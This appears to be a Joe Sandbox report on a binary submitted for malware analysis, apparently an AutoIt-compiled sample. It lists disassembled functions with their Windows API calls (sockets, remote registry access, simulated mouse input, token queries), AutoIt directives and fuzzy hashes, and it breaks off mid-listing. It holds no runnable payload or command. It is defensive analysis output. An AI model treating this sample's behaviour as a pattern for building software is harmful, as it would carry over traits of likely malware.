Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: 14d676fe950c77acac2ca60095baaf76f59eb1fef50af408074c7cd7f49ebd12
Instruction ID: 31eae2cc01a3d34a56338d92ec6ba46816a9cec80571d4c8871f04809a1f4cac
Opcode Fuzzy Hash: 14d676fe950c77acac2ca60095baaf76f59eb1fef50af408074c7cd7f49ebd12
Instruction Fuzzy Hash: FA315AB1911149BFDB16DB91DC99EFFB7BCEF08300F00016AE512E2241EB749F459AA0

Uniqueness

Uniqueness Score: -1.00%

Function 009E653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009E655B
GetWindowLongW.USER32(01634AA0,000000F0), ref: 009E658E
GetWindowLongW.USER32(01634AA0,000000F0), ref: 009E65C3
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 009E65F5
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009E661F
GetWindowLongW.USER32(00000000,000000F0), ref: 009E6630
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009E664A

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: fe47fe0a222ac545b4f99a16593ffecd0f0cad4f7f920911b3860d01dce8f388
Instruction ID: 9fb7eb2d8d1a61015938b9dca7d90f6b3743656c60ab0c52d0150c8892b93982
Opcode Fuzzy Hash: fe47fe0a222ac545b4f99a16593ffecd0f0cad4f7f920911b3860d01dce8f388
Instruction Fuzzy Hash: F5311130714294AFDB22CF5ADC88F653BE5BB6A790F1801A8F5118F2B5CB21EC41DB40

Uniqueness

Uniqueness Score: -1.00%

Function 009D6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 009D80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009D80CB

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009D64D9
WSAGetLastError.WSOCK32(00000000), ref: 009D64E8
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 009D6521
connect.WSOCK32(00000000,?,00000010), ref: 009D652A
WSAGetLastError.WSOCK32 ref: 009D6534
closesocket.WSOCK32(00000000), ref: 009D655D
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 009D6576

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 6fe2f3df824e3f0fc06097ba9b99ac75c2dd27b741d0346df5b70e3f3e9ac36d
Instruction ID: 27d5972818c0ce302c1086fa188fea3b3aaae53fca9d3bcfed7820cfefb1725f
Opcode Fuzzy Hash: 6fe2f3df824e3f0fc06097ba9b99ac75c2dd27b741d0346df5b70e3f3e9ac36d
Instruction Fuzzy Hash: 2031B331640118AFDF10AF64DC95BBE7BADEB85710F04806AF9069B391CB74AD44DB61

Uniqueness

Uniqueness Score: -1.00%

Function 009BE0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009BE0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009BE120
SysAllocString.OLEAUT32(00000000), ref: 009BE123
SysAllocString.OLEAUT32 ref: 009BE144
SysFreeString.OLEAUT32 ref: 009BE14D
StringFromGUID2.OLE32(?,?,00000028), ref: 009BE167
SysAllocString.OLEAUT32(?), ref: 009BE175

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 33955e5fee278c6503df129d46e99a8ab9017980363f3d7d0f2c42fb8bde3392
Instruction ID: b3ced5ee83bde4005f24da267d35650adea9cf6ca4a51c6c27a006464a1017ed
Opcode Fuzzy Hash: 33955e5fee278c6503df129d46e99a8ab9017980363f3d7d0f2c42fb8bde3392
Instruction Fuzzy Hash: BA217475609108AFDB10AFACDD88DEB77ECEB09770B108126F915CB2A0DA74DC419B64

Uniqueness

Uniqueness Score: -1.00%

Function 009BFB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 009BFB81
__wcsnicmp.LIBCMT ref: 009BFBA2
__wcsnicmp.LIBCMT ref: 009BFBBC

Strings

#requireadmin, xrefs: 009BFB9C
#notrayicon, xrefs: 009BFB79
#OnAutoItStartRegister, xrefs: 009BFBB6

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: 5cf024759db1059ee1f00f0730533cba605e122e9dee7d1c3fb2ce5f25990c3e
Instruction ID: 3015ff58e74e96103df202d68ae91df7d71c6b8472c95d5c9787070f00334060
Opcode Fuzzy Hash: 5cf024759db1059ee1f00f0730533cba605e122e9dee7d1c3fb2ce5f25990c3e
Instruction Fuzzy Hash: DA216732104224A6D334BB24DE32FF7B79CDF91360F108436F88986141EB51AA82C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 009E783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00961D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00961D73
Part of subcall function 00961D35: GetStockObject.GDI32(00000011), ref: 00961D87
Part of subcall function 00961D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00961D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 009E78A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 009E78AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 009E78B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 009E78C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 009E78D4

Strings

Msctls_Progress32, xrefs: 009E7872

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 1de8e94630d6155b13de8fb2b16d325d36bb8c5e137ce73f41f23993d24bf4f1
Instruction ID: 2a3e4b137146d5b2aee12f40927f38910f908d09a131c36981a47b312a49197f
Opcode Fuzzy Hash: 1de8e94630d6155b13de8fb2b16d325d36bb8c5e137ce73f41f23993d24bf4f1
Instruction Fuzzy Hash: A111B2B2110219BFEF159FA1CC85EE77F6DEF08798F014115FA04A6090C7729C21DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009841C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00984292,?), ref: 009841E3
GetProcAddress.KERNEL32(00000000), ref: 009841EA
EncodePointer.KERNEL32(00000000), ref: 009841F6
DecodePointer.KERNEL32(00000001,00984292,?), ref: 00984213

Strings

combase.dll, xrefs: 009841DE
RoInitialize, xrefs: 009841D2

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: 64051526314ec8d37d1b84a31f10abdd3d1b24daf6fb89ec0995191844f8c8e7
Instruction ID: f9894331cbdd9fc57c78daa6fc18abcbab4aeb4d87934b4d598d8d378e4f6b52
Opcode Fuzzy Hash: 64051526314ec8d37d1b84a31f10abdd3d1b24daf6fb89ec0995191844f8c8e7
Instruction Fuzzy Hash: 28E0D8B05A4B41DFDB30AFF4EC4CB243594BB64B06F004534B521D91E0D7B084A39F00

Uniqueness

Uniqueness Score: -1.00%

Function 0098429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,009841B8), ref: 009842B8
GetProcAddress.KERNEL32(00000000), ref: 009842BF
EncodePointer.KERNEL32(00000000), ref: 009842CA
DecodePointer.KERNEL32(009841B8), ref: 009842E5

Strings

combase.dll, xrefs: 009842B3
RoUninitialize, xrefs: 009842A7

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: a8fb488fa2a68439c342643b61ede9c85c2acc1d21bab857ce768325f809b590
Instruction ID: 2af7eea98ca984513d64d44d932bb4c77cd1fc5ae6e1f48e0cda3c8d04c5c90a
Opcode Fuzzy Hash: a8fb488fa2a68439c342643b61ede9c85c2acc1d21bab857ce768325f809b590
Instruction Fuzzy Hash: A2E0867C669305DFDB20DFA4EC4DB203AA4BB18746F104135F110D91E0CB704852EF04

Uniqueness

Uniqueness Score: -1.00%

Function 009C675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 009C68AD
_memmove.LIBCMT ref: 009C67E8

Part of subcall function 00969997: __itow.LIBCMT ref: 009699C2
Part of subcall function 00969997: __swprintf.LIBCMT ref: 00969A0C

_memmove.LIBCMT ref: 009C685B
_memmove.LIBCMT ref: 009C6942
_memmove.LIBCMT ref: 009C695B
_memmove.LIBCMT ref: 009C6977

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: a69b3c7dd5e766397e51f4ba4d00f0bc8c0383f177f2a47a06efa59b11b93ec4
Instruction ID: c25f4155413b100ea08756650bc7c0d08511b38b72d8ad8e5df25bf29f5df011
Opcode Fuzzy Hash: a69b3c7dd5e766397e51f4ba4d00f0bc8c0383f177f2a47a06efa59b11b93ec4
Instruction Fuzzy Hash: FA61BD3090065A9BDF11EF64CC82FFE77A8AF85308F04451DF95A5B292DB34AD46CB52

Uniqueness

Uniqueness Score: -1.00%

Function 009E046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00967F41: _memmove.LIBCMT ref: 00967F82

Part of subcall function 009E10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E0038,?,?), ref: 009E10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E0548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009E0588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 009E05AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 009E05D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 009E0617
RegCloseKey.ADVAPI32(00000000), ref: 009E0624

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: e357413d0a5f24d894efad42ccff7d998dada9b944c8a21b0f56d5597dc5c172
Instruction ID: 3a7571af43eefc1592e9a39a53d7fd994857ac26228eee9ff2f3fe7b22c4efce
Opcode Fuzzy Hash: e357413d0a5f24d894efad42ccff7d998dada9b944c8a21b0f56d5597dc5c172
Instruction Fuzzy Hash: 3A515731108280AFCB11EF65C895E6ABBE8FFC9714F04491DF5858B2A2DB71ED45CB52

Uniqueness

Uniqueness Score: -1.00%

Function 009E5A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 009E5A82
GetMenuItemCount.USER32(00000000), ref: 009E5AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 009E5AE1
GetMenuItemID.USER32(?,?), ref: 009E5B50
GetSubMenu.USER32(?,?), ref: 009E5B5E
PostMessageW.USER32(?,00000111,?,00000000), ref: 009E5BAF

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 6e0b9bd545ab6fae6db4808025b867c99ae467c8cab8deb2492e294ddd67fabc
Instruction ID: 000f4048db576c0d914b0c95fdf0c0090a98f851fb3d1ffea72adedbed0aa844
Opcode Fuzzy Hash: 6e0b9bd545ab6fae6db4808025b867c99ae467c8cab8deb2492e294ddd67fabc
Instruction Fuzzy Hash: 0E519031E00619EFCF11EFA5C885AAEB7B4EF88314F154469F801BB351CB34AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 009BF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009BF3F7
VariantClear.OLEAUT32(00000013), ref: 009BF469
VariantClear.OLEAUT32(00000000), ref: 009BF4C4
_memmove.LIBCMT ref: 009BF4EE
VariantClear.OLEAUT32(?), ref: 009BF53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 009BF569

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 01c5fa499782a74b131e5af0d80de154ae27e368dd7c115f95176f78bc772d44
Instruction ID: e7b0f8c1cf68ce3bb9e474801ac5e4edd129ca11f47a6ae0efedc1f34cecdf5b
Opcode Fuzzy Hash: 01c5fa499782a74b131e5af0d80de154ae27e368dd7c115f95176f78bc772d44
Instruction Fuzzy Hash: 9A515AB5A00209AFCB10CF58D894EAAB7B9FF4C354B15856AF959DB350E730E911CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009C26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009C2747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009C2792
IsMenu.USER32(00000000), ref: 009C27B2
CreatePopupMenu.USER32 ref: 009C27E6
GetMenuItemCount.USER32(000000FF), ref: 009C2844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 009C2875

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: bf617f278d6ebc0592c0da524da7158c51d4bdb1b81302ddd5272c29846a3e80
Instruction ID: dc253dcd250d0a7d9a5b08373909ca132c8ee35abb3f7b59719abf268f1f2616
Opcode Fuzzy Hash: bf617f278d6ebc0592c0da524da7158c51d4bdb1b81302ddd5272c29846a3e80
Instruction Fuzzy Hash: 15519C70E0434AEBDF25CF68D888FAEBBF9AF44314F10456EE8119B291D7709944CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00961765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00962612: GetWindowLongW.USER32(?,000000EB), ref: 00962623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0096179A
GetWindowRect.USER32(?,?), ref: 009617FE
ScreenToClient.USER32(?,?), ref: 0096181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0096182C
EndPaint.USER32(?,?), ref: 00961876

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 3eee1b507be5ae398fc31973780e351204aff0fa1c3d225fe487ac44545b0284
Instruction ID: 52f43ea1fb6d197ab29c98e21385bd569e93a8b6a123647b1cf7843e38f85240
Opcode Fuzzy Hash: 3eee1b507be5ae398fc31973780e351204aff0fa1c3d225fe487ac44545b0284
Instruction Fuzzy Hash: DD41AF70105344AFDB21DF69DC84FBA7BE8EB89724F080629F9958B2A1C7349C46DB61

Uniqueness

Uniqueness Score: -1.00%

Function 009EB958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00A267B0,00000000,01634AA0,?,?,00A267B0,?,009EB862,?,?), ref: 009EB9CC
EnableWindow.USER32(00000000,00000000), ref: 009EB9F0
ShowWindow.USER32(00A267B0,00000000,01634AA0,?,?,00A267B0,?,009EB862,?,?), ref: 009EBA50
ShowWindow.USER32(00000000,00000004,?,009EB862,?,?), ref: 009EBA62
EnableWindow.USER32(00000000,00000001), ref: 009EBA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 009EBAA9

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: f5682e69445755aba82d3d9d7b09dc14f476714e26ad0b183db77c7454667255
Instruction ID: 4665ebd5ac6498d04286abac7e5f0d242b88b814d8897e2d8379ae64d0adae4f
Opcode Fuzzy Hash: f5682e69445755aba82d3d9d7b09dc14f476714e26ad0b183db77c7454667255
Instruction Fuzzy Hash: A9415030604681AFDB23CF56C499BA67BE5BB05714F1842B9EA488F2A3C731AC45DB51

Uniqueness

Uniqueness Score: -1.00%

Function 009D73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,009D5134,?,?,00000000,00000001), ref: 009D73BF

Part of subcall function 009D3C94: GetWindowRect.USER32(?,?), ref: 009D3CA7

GetDesktopWindow.USER32 ref: 009D73E9
GetWindowRect.USER32(00000000), ref: 009D73F0
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 009D7422

Part of subcall function 009C54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 009C555E

GetCursorPos.USER32(?), ref: 009D744E
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 009D74AC

Memory Dump Source

Source File: 00000000.00000002.2133394724.0000000000961000.00000020.00000001.01000000.00000003.sdmp, Offset: 00960000, based on PE: true

Associated: 00000000.00000002.2133170296.0000000000960000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.00000000009EF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133442799.0000000000A15000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133517312.0000000000A1F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133535196.0000000000A28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_960000_SecuriteInfo.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: ad0d5931d8d1574d5c208a529e5161443e6695a5a239490cbef7c430e4ee5d8f
Instruction ID: 7257e868d789ccd1c0ce28357fd1b41dfff740d479538011fe4a26b8b475ae77
Opcode Fuzzy Hash: ad0d5931d8d1574d5c208a529e5161443e6695a5a239490cbef7c430e4ee5d8f
Instruction Fuzzy Hash: 0A31E672548345ABD720DF54D849F5BBBEAFF88314F00491AF58897191DB70EE48CB92

Uniqueness

Uniqueness Score: -1.00%

Function 009B8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 009B85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009B8608
Part of subcall function 009B85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009B8612
Part of subcall function 009B85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009B8621
Part of subcall function 009B85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009B8628
